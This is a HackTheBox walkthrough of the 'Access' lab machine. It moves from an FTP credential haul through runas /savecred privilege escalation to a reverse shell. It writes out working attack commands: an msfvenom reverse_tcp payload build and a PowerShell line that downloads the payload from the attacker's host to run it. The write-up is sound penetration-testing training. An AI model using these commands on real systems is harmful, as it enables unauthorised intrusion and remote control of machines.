Here’s how to pop the box titled ‘Access’ on HackTheBox! Watch the video below or continue reading.
To start, let’s do an nmap scan:
nmap -sV -sC 10.10.10.98
We can see that there’s a web server, telnet, and FTP open. Let’s try for anonymous FTP access.
Sure enough, it’s allowed. There’s two directories…
In each directory, there’s a file. Let’s pull each of them.
If we run the ‘file’ command on the backup.mdb file, we can see it’s a Microsoft Access Database.
If I pop it open in Microsoft Access, there’s a particular table of interest. We’ve got creds!
The other file we pulled is a ZIP, and can be extracted with the above password.
In the ZIP is a .PST file that we can extract using readpst:
readpst -o pstexport/ -D -j4 -r -tea -u -w -m Access\ Control.pst
Sure enough, if when we cat the contents of the message we see another credential among the headers and markup:
Next, we telnet in to the box with those creds:
Grabbing the user flag:
Next, let’s do some recon to find active users and any stored credentials.
powershell -Command (get-wmiobject win32_useraccount)
The above output is very interesting, we can see that there’s stored credentials… maybe the “security” user ran something as Administrator and the password is cached?
runas /user:Administrator /noprofile /savecred "cmd.exe /c whoami > C:\users\security\me.txt"
Running the “runas” command with /savecred works to elevate to Administrator! Above, I plopped out the contents of a ‘whoami’ command to prove it. At this point, we can get the root flag!
runas /user:Administrator /noprofile /savecred "cmd.exe /c type C:\users\administrator\desktop\root.txt > C:\users\security\root.txt"
But why stop there? Let’s get Meterpreter shell as SYSTEM to take it a step further.
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.10.12.61 LPORT=31337 -e x86/shikata_ga_nai -f exe -o shell.exe
Then we pull down the .exe with the Meterpreter payload embedded onto the system:
powershell -Command (new-object System.Net.WebClient).Downloadfile('http://10.10.12.61:8000/shell.exe', 'shell.exe')
Then let’s get ready on my Kali system to catch the reverse shell before we run it.
The rest is a piece of cake. I run the shell.exe file as Administrator on the box, using the saved credential technique mentioned above, and the shell connects to me.
That’s it! This box was interesting because it wasn’t as exploit-based as it was permissions based. Like most HackTheBox systems, the name is fitting!
Scott Rainville is a recent graduate of Champlain College currently working as a Cybersecurity Analyst/Engineer/purple-teamer. He loves nearly anything to do with computer networking and cybersecurity, from malware analysis to penetration testing.